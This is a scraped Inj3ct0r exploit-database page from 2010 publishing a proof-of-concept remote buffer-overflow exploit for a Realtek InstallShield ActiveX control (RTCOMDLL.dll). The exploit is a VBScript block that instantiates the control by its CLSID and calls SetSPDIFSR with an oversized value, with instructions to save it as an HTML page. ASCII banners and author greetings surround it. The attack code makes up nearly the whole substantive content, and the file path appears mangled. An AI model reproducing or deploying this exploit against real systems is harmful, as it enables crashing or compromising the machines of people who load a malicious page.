[remote exploits] – Realtek (InstallShield-RTCOMDLL.dll) Remote BOF Exploit
<!DOCTYPE html PUBLIC ‘-//W3C//DTD XHTML 1.0 Strict//EN’ ‘http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd’><html xmlns=’http://www.w3.org/1999/xhtml’><head><meta http-equiv=’Content-Type’ content=’text/html; charset=utf-8′ /><meta http-equiv=’Content-Language’ content=’en’ /><title>Realtek (InstallShield-RTCOMDLL.dll) Remote BOF Exploit | Inj3ct0r – exploit database : vulnerability : 0day : shellcode</title><meta name=’description’ content=’Date: 27 Sep 2010 | Exploit category: remote exploits | Exploit author: indoushka | Inj3ct0r – exploit database : vulnerability : 0day : shellcode’ /><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’ /><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’ /><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=======================================================
Realtek (InstallShield-RTCOMDLL.dll) Remote BOF Exploit
=======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ####################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 ####################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
# Vendor: http://www.apple.com/legal/sla/
# Date: 2010-07-27
# Author : indoushka
# Thanks to : Dz-Ghost Team
# Contact : 00213771818860
# Home : www.sec4ever.net
# Tested on : windows SP2 Francais V.(Pnx2 2.0)
########################################################################
# Exploit By indoushka
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:CC0CA09A-5B84-43F2-BE5C-9169C192565F' id='target' />
<script language='vbscript'>
'Wscript.echo typename(target)
'for debugging/custom prolog
targetFile = "C:Program FilesRealtekInstallShieldRTCOMDLL.dll"
prototype = "Sub SetSPDIFSR ( ByVal dwSR As Long )"
memberName = "SetSPDIFSR"
progid = "RTCOMDLLLib.RTLCSSAPI"
argCount = 1
arg1=2147483647
target.SetSPDIFSR arg1
</script></job></package>
Save as .Html
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
———————————————————————————————————————————
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-09-27]</pre></body></html>
Source: http://inj3ct0r.com/exploits/14302
Leave a Reply